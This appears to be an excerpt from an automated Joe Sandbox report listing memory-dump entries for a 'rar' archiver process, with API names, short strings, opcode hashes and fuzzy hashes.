                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                                              • API String ID: 233258989-2277559157
                                                                                                                                                                                                                              • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                              • Instruction ID: 6c18a1dcc06d4a3433817e7b075bfd1dec43e77225adc0279d2d3f25f5df486f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F02B222B086C241EA24FE2599453FEA3D1AF427A0FC40035DE9E4779ADF7CE465A331
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                                              • String ID: rtmp%d
                                                                                                                                                                                                                              • API String ID: 2308737092-3303766350
                                                                                                                                                                                                                              • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                              • Instruction ID: b13be78e7598f2170458299d994e8885cde0c8b8f80c4c5c688b7fced498e046
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60516122A29AC649EB70BF21D8451FEA390FF40BA4F951031DD0D47A9ADE2CD625E730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                                                                              • String ID: rar -ioff
                                                                                                                                                                                                                              • API String ID: 4151682896-4089728129
                                                                                                                                                                                                                              • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                              • Instruction ID: 4b88d4c1a03e725db875cd4a8da0dc8e58cbb17a99100d865558ebbeaae24c8b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA018B24A1DA878AFB14BF71EC506F0A3E1AF54B21FD45430D84E822A4CE2CA168A630
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                              • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                              • API String ID: 667068680-1824683568
                                                                                                                                                                                                                              • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                              • Instruction ID: 7eaf021912bf0188cb786ec50abde6eec09b689b58bdc067da6320219fbcfca2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5F01D25B09BC68AEB04AF51F8540B5A3A0BF59FE0B985130DD5E07768EE6CE469D330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: +$-
                                                                                                                                                                                                                              • API String ID: 3215553584-2137968064
                                                                                                                                                                                                                              • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                              • Instruction ID: 9d77c5339d3ca8763b23142be068d7352e5f9b6e1ddbdddd739526f4e1fb0fb8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3127E2EF099C386FB64BE1590447F8A6D6EB40774FD94232D69A436C0DF2CA671A334
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2092471728-0
                                                                                                                                                                                                                              • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                              • Instruction ID: 8a3e7d368d6f368dd07d7a0932eb346d4a2c5903b7b02653211890b92caa6e22
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F51653260878186EB21DF15E4401EAB7E4FB85BA4F900236EA9D43B98DF3DE554DB30
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                                              • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                              • Instruction ID: a2e40f7aff97174897273e5d7626792d5e24cee073e40d64728426ab84cb7a4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93516BB2B106918EEB54DFB4D4401EC77B1F708B98BA0402ADE0E97B58EE38D565CB20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                                              • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                              • Instruction ID: a5d7d60d46195acff468ccd02accbcbb4676c165c5d5912981ee7e342a8663d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B313A62F146918DEB04DFB4D8901EC77B0FB08B58B54502AEE0E97A58EB38D495D320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                              • API String ID: 0-13699710
                                                                                                                                                                                                                              • Opcode ID: 8ca027f0faffb6d8ce24db6bb8d864dc0127119bd94cdfd60b96efa7e743a067
                                                                                                                                                                                                                              • Instruction ID: f1eeef85b1515d61a2cf6a040a662941c0917ef2b73d6d290c27f0a7ccfda185
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ca027f0faffb6d8ce24db6bb8d864dc0127119bd94cdfd60b96efa7e743a067
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA818121A086C249EB20FF25D8152F9A7D2FB857A4FC04131DD4D4B6CADE6DE625E330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                                              • API String ID: 3913153233-629598281
                                                                                                                                                                                                                              • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                              • Instruction ID: b4d8d8704de7cf28cb93b09e433d4aed3ba69231793c2a814e6d10f48071943d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1661C336B0968386EB14EF11E440AF9A7D1FF44BA4F948532EE4A47748DF38E851A730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                              • String ID: $ACL
                                                                                                                                                                                                                              • API String ID: 2361174398-1852320022
                                                                                                                                                                                                                              • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                              • Instruction ID: 49e753eb76743656dce6155a4ed3cb63d63695dc4648c1fb70544003317f5dea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35317361A09AC286EB24EF11E8503E9A7E4FB98794FC04031DA4D5365ADF3CE625D770
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
